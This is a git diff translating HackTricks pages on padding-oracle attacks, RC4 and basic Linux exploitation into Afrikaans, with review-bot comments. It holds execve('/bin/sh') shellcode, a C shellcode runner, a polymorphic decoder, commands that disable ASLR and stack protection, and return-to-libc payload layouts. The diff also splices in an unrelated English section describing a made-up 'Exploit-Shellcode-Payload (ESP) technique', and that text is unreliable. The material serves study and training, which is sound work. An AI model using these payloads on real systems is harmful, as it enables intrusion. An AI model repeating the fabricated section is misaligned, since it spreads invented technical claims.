0x02 is: `E''7 = \x02 ^ I15` dus hoef jy net die **`E'14`** te vind wat 'n **`C14` gelyk aan `0x02`** genereer.\ +Doen dan dieselfde stappe om C14 te ontsluit: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**Follow this chain until you decrypt the whole encrypted text.** +**Volg hierdie ketting totdat jy die hele versleutelde teks ontsluit.** -## Detection of the vulnerability +## Opmerking van die kwesbaarheid -Register and account and log in with this account .\ -If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. 
The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t. +Registreer en rekeninge en teken in met hierdie rekening.\ +As jy **baie keer teken** en altyd dieselfde koekie kry, is daar waarskynlik **iets fout** in die toepassing. Die koekie wat teruggestuur word, moet elke keer wat jy teken, uniek wees. As die koekie **altyd** dieselfde is, sal dit waarskynlik altyd geldig wees en sal daar **geen manier wees om dit ongeldig te maak nie**. -Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ -But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. +Nou, as jy probeer om die **koekie te wysig**, kan jy sien dat jy 'n **fout** van die toepassing kry.\ +Maar as jy die opvulling BF (deur byvoorbeeld padbuster te gebruik), slaag jy daarin om 'n ander koekie te kry wat geldig is vir 'n ander gebruiker. Hierdie scenario is baie waarskynlik kwesbaar vir padbuster. -## References +## Verwysings * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index e951992a4..34ebea7da 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. +As jy op een of ander manier 'n platte teks kan enkripteer met RC4, kan jy enige inhoud wat deur daardie RC4 enkripteer is (met dieselfde wagwoord) dekripteer deur net die enkripsiefunksie te gebruik. -If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: +As jy 'n bekende platte teks kan enkripteer, kan jy ook die wagwoord onttrek. Meer verwysings kan gevind word in die HTB Kryptos-masjien: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} @@ -29,16 +27,14 @@ If you can encrypt a known plaintext you can also extract the password. More ref
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/emails-vulns.md b/emails-vulns.md index 61765ef5f..917a87dcb 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,16 +1,16 @@ -# Emails Vulnerabilities +# E-poskwesbaarhede
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
@@ -20,14 +20,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index deff517c3..29f9a071f 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -1,81 +1,75 @@ -# Linux Exploiting (Basic) (SPA) +# Linux Exploiting (Basies) (SPA) -## Linux Exploiting (Basic) (SPA) +## Linux Exploiting (Basies) (SPA)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## **ASLR** -Aleatorización de direcciones +Aleatorisering van adresse -**Desactiva aleatorizacion(ASLR) GLOBAL (root)**:\ +**Deaktiveer globale aleatorisering (ASLR) (root)**:\ echo 0 > /proc/sys/kernel/randomize\_va\_space\ -Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize\_va\_space +Heraktiveer globale aleatorisering: echo 2 > /proc/sys/kernel/randomize\_va\_space -**Desactivar para una ejecución** (no requiere root):\ -setarch \`arch\` -R ./ejemplo argumentos\ -setarch \`uname -m\` -R ./ejemplo argumentos +**Deaktiveer vir 'n uitvoering** (vereis nie root nie):\ +setarch \`arch\` -R ./voorbeeld argumente\ +setarch \`uname -m\` -R ./voorbeeld argumente -**Desactivar protección de ejecución en pila**\ -gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo +**Deaktiveer uitvoeringsbeskerming op stoor**\ +gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack voorbeeld.c -o voorbeeld -**Core file**\ +**Kernlêer**\ ulimit -c unlimited\ -gdb /exec core\_file\ +gdb /exec kern\_leer\ /etc/security/limits.conf -> \* soft core unlimited -**Text**\ +**Tekst**\ **Data**\ **BSS**\ **Heap** -**Stack** - -**Sección BSS**: Variables globales o estáticas sin inicializar +**Stoor** +**BSS-seksie**: Globale of statiese veranderlikes sonder inisialisering ``` static int i; ``` - -**Sección DATA**: Variables globales o estáticas inicializadas - +**Afdeling DATA**: Globale of geïnitialiseerde statiese veranderlikes ``` int i = 5; ``` +**Afdeling TEKS**: Instruksies van die kode (opcodes) -**Sección TEXT**: Instrucciones del código (opcodes) +**Afdeling HEAP**: Dinamies toegewysde buffer (malloc(), calloc(), realloc()) -**Sección HEAP**: Buffer reservados de forma dinánima (malloc(), calloc(), realloc() ) +**Afdeling STACK**: Die stoor (Oorgedra argumente, omgewingsreekse (env), plaaslike veranderlikes...) 
-**Sección STACK**: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…) - -## **1.STACK OVERFLOWS** +## **1. STACK OVERFLOWS** > buffer overflow, buffer overrun, stack overrun, stack smashing -Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso. - -Para obtener la dirección de una función dentro de un programa se puede hacer: +Segmentfout of segmentoortreding: Wanneer daar gepoog word om toegang tot 'n geheue-adres te verkry wat nie aan die proses toegewys is nie. +Om die adres van 'n funksie binne 'n program te verkry, kan jy dit doen: ``` objdump -d ./PROGRAMA | grep FUNCION ``` - ## ROP -### Call to sys\_execve +### Oproep na sys\_execve {% content-ref url="rop-syscall-execv.md" %} [rop-syscall-execv.md](rop-syscall-execv.md) 
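Review bot: "pila"/"stack" is translated inconsistently in this hunk, and the word chosen reads wrong. "**Deaktiveer uitvoeringsbeskerming op stoor**", "**Stoor**" in the segment list and "**Afdeling STACK**: Die stoor" all use "stoor" (store), while the rest of the file uses "stapel" ("die stapel nie uitvoerbaar is nie", "Plaas die argumente in die stapel"); use "stapel" throughout. Two smaller points: the command line "gdb /exec core\_file" was rewritten as "gdb /exec kern\_leer", but command arguments should be left untouched, and the blank lines separating prose from the fenced blocks (before "``` static int i; ```", "``` int i = 5; ```" and "``` objdump -d ./PROGRAMA | grep FUNCION ```") were dropped, which some markdown renderers need to open a fence. The banner line also ends in "github-repos" where the other files in this patch use "GitHub-opslagplekke"; pick one.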
@@ -83,39 +77,36 @@ objdump -d ./PROGRAMA | grep FUNCION ## **2.SHELLCODE** -Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_” +Bekyk kernel-onderbrekings: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep "\_\_NR\_" setreuid(0,0); // \_\_NR\_setreuid 70\ -execve(“/bin/sh”, args\[], NULL); // \_\_NR\_execve 11\ +execve("/bin/sh", args\[], NULL); // \_\_NR\_execve 11\ exit(0); // \_\_NR\_exit 1 -xor eax, eax ; limpiamos eax\ -xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\ +xor eax, eax ; maak eax skoon\ +xor ebx, ebx ; ebx = 0 want daar is geen argument om oor te dra\ mov al, 0x01 ; eax = 1 —> \_\_NR\_exit 1\ -int 0x80 ; Ejecutar syscall +int 0x80 ; Voer syscall uit -**nasm -f elf assembly.asm** —> Nos devuelve un .o\ -**ld assembly.o -o shellcodeout** —> Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump**\ -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes - -**Comprobar que la shellcode funciona** +**nasm -f elf assembly.asm** —> Gee ons 'n .o terug\ +**ld assembly.o -o shellcodeout** —> Gee ons 'n uitvoerbare lêer wat bestaan uit die saamgestelde kode en ons kan die opcodes kry met **objdump**\ +**objdump -d -Mintel ./shellcodeout** —> Om te sien dat dit werklik ons shellcode is en om die OpCodes te kry +**Bevestig dat die shellcode werk** ``` char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80” void main(){ - void (*fp) (void); - fp = (void *)shellcode; - fp(); +void (*fp) (void); +fp = (void *)shellcode; +fp(); } ``` +Om te sien of die stelseloproep korrek uitgevoer word, moet die vorige program gekompileer word en die stelseloproepe moet verskyn in **strace ./GEKOMPILEERDE\_PROGRAM** -Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO** - -A la hora de crear shellcodes 
se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código. - -EJ **TRUCO (/bin/sh)**: +By die skep van shellcodes kan 'n truuk gebruik word. Die eerste instruksie is 'n sprong na 'n oproep. Die oproep roep die oorspronklike kode op en plaas ook die EIP in die stapel. Na die oproepinstruksie het ons die string ingevoeg wat ons nodig het, sodat ons met daardie EIP na die string kan wys en steeds die kode kan uitvoer. +VB **TRUUK (/bin/sh)**: ``` jmp 0x1f ; Salto al último call popl %esi ; Guardamos en ese la dirección al string @@ -129,15 +120,13 @@ leal 0x8(%esi), %ecx ; arg[2] = {“/bin/sh”, “0”} leal 0xc(%esi), %edx ; arg3 = NULL int $0x80 ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL) xorl %ebx, %ebx ; ebx = NULL -movl %ebx, %eax +movl %ebx, %eax inc %eax ; Syscall 1 int $0x80 ; exit(0) call -0x24 ; Salto a la primera instrución .string \”/bin/sh\” ; String a usar ``` - -**EJ usando el Stack(/bin/sh):** - +**Gebruik van de Stack (/bin/sh):** ``` section .text global _start 
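Review bot: on the @@ -83,39 hunk, the C snippet's indentation inside the fence is stripped ("- void (*fp) (void);" / "+void (*fp) (void);", and likewise for "fp = (void *)shellcode;" and "fp();"), which is an unrelated code-formatting change in a translation commit; keep the original indentation so the diff only touches prose. The translated lines "**Bevestig dat die shellcode werk**" and "VB **TRUUK (/bin/sh)**:" also lost the blank line that separated them from the following fence. The assembly comments in that fence ("; Salto al último call", "; Guardamos en ese la dirección al string") stay in Spanish while the surrounding prose is now Afrikaans; either translate the comments or note that code blocks are intentionally left as-is.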
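Review bot: on the @@ -129,15 hunk, "**Gebruik van de Stack (/bin/sh):**" uses the Dutch article "de" instead of Afrikaans "die" and drops the "EJ" (example) marker from the original "**EJ usando el Stack(/bin/sh):**"; suggest "**VB gebruik van die stapel (/bin/sh):**" to match the "VB **TRUUK (/bin/sh)**:" label used for the previous example. The "-movl %ebx, %eax" / "+movl %ebx, %eax" pair changes only whitespace inside a code block and should be dropped from a translation change, and the blank line before the "``` section .text" fence was removed here as well.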
@@ -158,181 +147,215 @@ mov ecx, esp ; arg2 = args[] mov al, 0x0b ; Syscall 11 int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL) ``` - **EJ FNSTENV:** +# Linux Exploiting Basic ESP + +## Introduction + +In this section, we will cover the basics of exploiting Linux systems using the ESP (Exploit-Shellcode-Payload) technique. We will explore the steps involved in crafting and executing an exploit, as well as the different components of an exploit. + +## Prerequisites + +Before diving into Linux exploitation, it is important to have a solid understanding of the following concepts: + +- Linux operating system +- Assembly language +- Buffer overflows +- Shellcode development + +## Exploit-Shellcode-Payload (ESP) Technique + +The ESP technique involves the following three components: + +1. Exploit: This is the vulnerability or weakness in the target system that allows an attacker to gain unauthorized access or control. +2. Shellcode: This is the payload that is injected into the target system to execute the desired actions. +3. Payload: This is the set of instructions or actions that the attacker wants to perform on the target system. + +## Crafting an Exploit + +Crafting an exploit involves the following steps: + +1. Identifying the vulnerability: This step involves finding a vulnerability in the target system that can be exploited. +2. Developing the shellcode: Once the vulnerability is identified, the attacker needs to develop the shellcode that will be injected into the target system. +3. Creating the payload: The payload is created by combining the exploit and the shellcode. +4. Delivering the payload: The final step is to deliver the payload to the target system, typically through a network connection. + +## Executing an Exploit + +Executing an exploit involves the following steps: + +1. Triggering the vulnerability: The attacker needs to trigger the vulnerability in the target system to initiate the exploit. +2. 
Injecting the shellcode: Once the vulnerability is triggered, the attacker injects the shellcode into the target system. +3. Executing the payload: The shellcode is executed, allowing the attacker to perform the desired actions on the target system. + +## Conclusion + +The ESP technique is a fundamental concept in Linux exploitation. By understanding the different components of an exploit and the steps involved in crafting and executing an exploit, you can effectively exploit vulnerabilities in Linux systems. ``` fabs fnstenv [esp-0x0c] pop eax ; Guarda el EIP en el que se ejecutó fabs … ``` +**Eierjagter:** -**Egg Huter:** +Dit bestaan uit 'n klein kode wat deur die geheuebladsye van 'n proses loop op soek na die daar gestoorde skulpkode (deur te soek na 'n handtekening wat in die skulpkode geplaas is). Dit is nuttig in gevalle waar daar slegs 'n klein spasie is om kode in te spuit. -Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada (busca alguna firma puesta en la shellcode). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código. - -**Shellcodes polimórficos** - -Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**: +**Polimorfiese skulpkode** +Dit bestaan uit versleutelde skulpe wat klein kodes bevat wat dit ontsluit en daarna daarna spring, deur gebruik te maak van die Call-Pop-truuk. 
Hier is 'n voorbeeld van 'n Caesar-versleutelde skulpkode: ``` global _start _start: - jmp short magic +jmp short magic init: - pop esi - xor ecx, ecx - mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) +pop esi +xor ecx, ecx +mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) desc: - sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) - sub cl, 1 - jnz desc - jmp short sc +sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) +sub cl, 1 +jnz desc +jmp short sc magic: - call init +call init sc: - ;Aquí va el shellcode +;Aquí va el shellcode ``` +1. **Aanval op die Frame Pointer (EBP)** -1. **Atacando el Frame Pointer (EBP)** - -Útil en una situación en la que podemos modificar el EBP pero no el EIP. - -Se sabe que al salir de una función se ejecuta el siguente código ensamblador: +Nuttig in 'n situasie waar ons die EBP kan wysig, maar nie die EIP nie. +Dit is bekend dat die volgende assamblierkode uitgevoer word wanneer 'n funksie verlaat word: ``` movl %ebp, %esp popl %ebp ret ``` +Op hierdie manier kan die EBP gewysig word wanneer 'n funksie (fvuln) wat deur 'n ander funksie geroep is, verlaat word. As die funksie wat fvuln geroep het klaar is, kan sy EIP gewysig word. -De esta forma, si se puede modificar el EBP al salir de una función (fvuln) que ha sido llamada por otra función, cuando la función que llamó a fvuln finalice, su EIP puede ser modificado. - -En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la direcciónd e la shellcode + 4 (hay que sumarle 4 por el pop). Así, al salir de la función, se meterá en ESP el valor de &(\&Shellcode)+4, con el pop se le restará 4 al ESP y este apuntará a la dirección de la shellcode cuando se ejcute el ret. 
+In fvuln kan 'n vals EBP ingevoer word wat na 'n plek wys waar die adres van die shellcode + 4 is (4 moet bygevoeg word vir die pop). Op hierdie manier, wanneer die funksie verlaat word, sal die waarde van &(\&Shellcode)+4 in ESP geplaas word, met die pop sal 4 van ESP afgetrek word en dit sal na die adres van die shellcode wys wanneer die ret uitgevoer word. **Exploit:**\ -\&Shellcode + "AAAA" + SHELLCODE + relleno + &(\&Shellcode)+4 +\&Shellcode + "AAAA" + SHELLCODE + vulsel + &(\&Shellcode)+4 **Off-by-One Exploit**\ -Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP. +Slegs die minst betekenisvolle byte van die EBP kan gewysig word. 'n Aanval soos die vorige kan uitgevoer word, maar die geheue wat die adres van die shellcode bevat, moet die eerste 3 byte deel met die EBP. -## **4. Métodos return to Libc** +## **4. Return to Libc-metodes** -Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar. +'n Nuttige metode wanneer die stapel nie uitvoerbaar is nie of 'n baie klein buffer het om te wysig. -El ASLR provoca que en cada ejecución las funciones se carguen en posiciones distintas de la memoria. Por lo tanto este método puede no ser efectivo en ese caso. Para servidores remotos, como el programa está siendo ejecutado constantemente en la misma dirección sí puede ser útil. +ASLR veroorsaak dat funksies by elke uitvoering op verskillende plekke in die geheue gelaai word. Daarom kan hierdie metode nie effektief wees in daardie geval nie. Vir afgeleë bedieners, aangesien die program konstant op dieselfde adres uitgevoer word, kan dit nuttig wees. 
-* **cdecl(C declaration)** Mete los argumentos en el stack y tras salir de la función limpia la pila -* **stdcall(standard call)** Mete los argumentos en la pila y es la función llamada la que la limpia -* **fastcall** Mete los dos primeros argumentos en registros y el resto en la pila +* **cdecl (C-verklaring)** Plaas die argumente in die stapel en maak die stapel skoon nadat die funksie verlaat is. +* **stdcall (standaardoproep)** Plaas die argumente in die stapel en die funksie wat geroep word, maak dit skoon. +* **fastcall** Plaas die eerste twee argumente in registers en die res in die stapel. -Se pone la dirección de la instrucción system de libc y se le pasa como argumento el string “/bin/sh”, normalmente desde una variable de entorno. Además, se usa la dirección a la función exit para que una vez que no se requiera más la shell, salga el programa sin dar problemas (y escribir logs). +Die adres van die system-instruksie van libc word geplaas en die string "/bin/sh" word as 'n argument oorgedra, gewoonlik vanuit 'n omgewingsveranderlike. Daarbenewens word die adres van die exit-funksie gebruik sodat die program sonder probleme kan afsluit (en logboeke skryf) sodra die skulp nie meer nodig is nie. 
**export SHELL=/bin/sh** -Para encontrar las direcciones que necesitaremos se puede mirar dentro de **GDB:**\ +Om die benodigde adresse te vind, kan jy binne **GDB** kyk:\ **p system**\ **p exit**\ -**rabin2 -i ejecutable** —> Da la dirección de todas las funciones que usa el programa al cargarse\ -(Dentro de un start o algun breakpoint): **x/500s $esp** —> Buscamos dentro de aqui el string /bin/sh +**rabin2 -i uitvoerbare lêer** —> Gee die adres van al die funksies wat deur die program gebruik word wanneer dit gelaai word\ +(Binne 'n begin of enige breekpunt): **x/500s $esp** —> Soek hierdie string /bin/sh -Una vez tengamos estas direcciones el **exploit** quedaría: +Nadat ons hierdie adresse het, sal die **exploit** so lyk: -“A” \* DISTANCIA EBP + 4 (EBP: pueden ser 4 "A"s aunque mejor si es el EBP real para evitar fallos de segmentación) + Dirección de **system** (sobreescribirá el EIP) + Dirección de **exit** (al salir de system(“/bin/sh”) se llamará a esta función pues los primero 4bytes del stack son tratados como la siguiente dirección del EIP a ejecutar) + Dirección de “**/bin/sh**” (será el parámetro pasado a 